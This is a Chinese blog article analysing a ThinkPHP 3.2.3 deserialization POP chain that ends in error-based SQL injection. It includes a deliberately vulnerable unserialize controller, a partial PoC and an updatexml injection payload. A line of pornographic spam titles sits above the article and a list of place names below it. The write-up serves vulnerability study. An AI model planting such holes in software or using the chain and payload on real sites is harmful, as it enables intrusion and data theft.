亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Thinkphp3.2.3反序列化漏洞實例代碼分析

發布時間:2023-02-25 09:51:00 來源:億速云 閱讀:315 作者:iii 欄目:開發技術

這篇文章主要介紹“Thinkphp3.2.3反序列化漏洞實例代碼分析”的相關知識,小編通過實際案例向大家展示操作過程,操作方法簡單快捷,實用性強,希望這篇“Thinkphp3.2.3反序列化漏洞實例代碼分析”文章能幫助大家解決問題。

魔術方法

以下面這個魔術方法為例:

_destruct

該方法的作用是,某個對象的所有引用都被刪除或者當對象被顯式銷毀時執行。例如下面代碼:

<?php
class User{
    public function __destruct()
    {
        echo "xino</br>";
    }
}
$test = new User();
$ser = serialize($test);
unserialize($ser);
?>

執行后會發現調用了魔術方法,我們要想辦法來尋找代碼之間的關系來構造 反序列化鏈

復現

這里我是用小皮面板搭建好環境后開始我們的分析,下面是主界面:

Thinkphp3.2.3反序列化漏洞實例代碼分析

需要在控制器IndexController.class.php 處寫入:

public function index(){
    unserialize(base64_decode($_GET[1]));
}

首先走到Library/Think/Image/Driver/Imagick.class.php ,代碼如下:

 public function __destruct()
    {
        empty($this->img) || $this->img->destroy();
    }
}

這里有一個可控的變量img,因為該變量走向了destory(),于是我們尋找一下:

Library/Think/Session/Driver/Memcache.class.php ,該處有個一樣的方法:

 public function destroy($sessID)
    {
        return $this->handle->delete($this->sessionName . $sessID);
    }

我們會發現handle和sessionName參數是可控,因為走向了delete函數,于是繼續跟進尋找delete,在Mode/Lite/Model.class.php 處:

   public function delete($options = array())
    {
        $pk = $this->getPk();
        if (empty($options) && empty($this->options['where'])) {
            // 如果刪除條件為空 則刪除當前數據對象所對應的記錄
            if (!empty($this->data) && isset($this->data[$pk])) {
                return $this->delete($this->data[$pk]);
            } else {
                return false;
            }
        }
        if (is_numeric($options) || is_string($options)) {
            // 根據主鍵刪除記錄
            if (strpos($options, ',')) {
                $where[$pk] = array('IN', $options);
            } else {
                $where[$pk] = $options;
            }
            $options          = array();
            $options['where'] = $where;
        }
        // 根據復合主鍵刪除記錄
        if (is_array($options) && (count($options) > 0) && is_array($pk)) {
            $count = 0;
            foreach (array_keys($options) as $key) {
                if (is_int($key)) {
                    $count++;
                }
            }
            if (count($pk) == $count) {
                $i = 0;
                foreach ($pk as $field) {
                    $where[$field] = $options[$i];
                    unset($options[$i++]);
                }
                $options['where'] = $where;
            } else {
                return false;
            }
        }
        // 分析表達式
        $options = $this->_parseOptions($options);
        if (empty($options['where'])) {
            // 如果條件為空 不進行刪除操作 除非設置 1=1
            return false;
        }
        if (is_array($options['where']) && isset($options['where'][$pk])) {
            $pkValue = $options['where'][$pk];
        }
        if (false === $this->_before_delete($options)) {
            return false;
        }
        $result = $this->db->delete($options);		//數據庫驅動類中的delete()
        if (false !== $result && is_numeric($result)) {
            $data = array();
            if (isset($pkValue)) {
                $data[$pk] = $pkValue;
            }
            $this->_after_delete($data, $options);
        }
        // 返回刪除記錄個數
        return $result;
    }

這里比較復雜,需要分析一下,pk,pk,pk,data,$options參數都是可控的,第二次調用該函數后是調用db(Library/Think/Db/Driver.class.php )里面的函數,進去看一下:

$table = $this-&gt;parseTable($options['table']);
$sql   = 'DELETE FROM ' . $table;
return $this-&gt;execute($sql, !empty($options['fetch_sql']) ? true : false);

這里只貼了比較關鍵的代碼,看到table經過parseTable處理之后進了sql語句,跟進了發現沒有過濾什么,直接返回了數據,最后調用了execute,我們分析其代碼:

 public function execute($str,$fetchSql=false) {
        $this->initConnect(true);
        if ( !$this->_linkID ) return false;
        $this->queryStr = $str;
        if(!empty($this->bind)){
            $that   =   $this;
            $this->queryStr =   strtr($this->queryStr,array_map(function($val) use($that){ return '''.$that->escapeString($val).'''; },$this->bind));
        }
        if($fetchSql){
            return $this->queryStr;
        }

看到第二行是一個初始化連接的代碼,我們跟進到最后發現:

 public function connect($config = '', $linkNum = 0, $autoConnection = false)
    {
        if (!isset($this->linkID[$linkNum])) {
            if (empty($config)) {
                $config = $this->config;
            }
            try {
                if (empty($config['dsn'])) {
                    $config['dsn'] = $this->parseDsn($config);
                }
                if (version_compare(PHP_VERSION, '5.3.6', '<=')) {
                    // 禁用模擬預處理語句
                    $this->options[PDO::ATTR_EMULATE_PREPARES] = false;
                }
                $this->linkID[$linkNum] = new PDO($config['dsn'], $config['username'], $config['password'], $this->options);
            } catch (\PDOException $e) {
                if ($autoConnection) {
                    trace($e->getMessage(), '', 'ERR');
                    return $this->connect($autoConnection, $linkNum);
                } elseif ($config['debug']) {
                    E($e->getMessage());
                }
            }
        }
        return $this->linkID[$linkNum];
    }

可以通過里面的相應代碼:

$this->config

建立數據庫連接,整個的POP鏈跟進順序如下:

__destruct()->destroy()->delete()->Driver::delete()->Driver::execute()->Driver::initConnect()->Driver::connect()->

因為構造poc較長,這里只貼關鍵處,有興趣的小伙伴可以自行去構造:

  public function __construct(){
            $this->db = new Mysql();
            $this->options['where'] = '';
            $this->pk = 'id';
            $this->data[$this->pk] = array(
                "table" => "name where 1=updatexml(1,user(),1)#",
                "where" => "1=1"
            ); }

生成后傳入payload即可實現錯報注入,體現在payload里就是table這個語句,經過一串的操作使之與數據庫連接來執行sql語句

關于“Thinkphp3.2.3反序列化漏洞實例代碼分析”的內容就介紹到這里了,感謝大家的閱讀。如果想了解更多行業相關的知識,可以關注億速云行業資訊頻道,小編每天都會為大家更新不同的知識點。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

岳普湖县| 环江| 常宁市| 牡丹江市| 恩施市| 萝北县| 漳平市| 罗源县| 威海市| 福清市| 梁山县| 阿荣旗| 伊吾县| 汝州市| 无极县| 酒泉市| 克什克腾旗| 长兴县| 修文县| 通辽市| 新建县| 米易县| 宕昌县| 交口县| 砀山县| 青冈县| 安庆市| 盘锦市| 锡林郭勒盟| 辉县市| 蛟河市| 连山| 九龙坡区| 涪陵区| 辽阳县| 高邑县| 贺州市| 黎川县| 湘西| 云梦县| 卢湾区|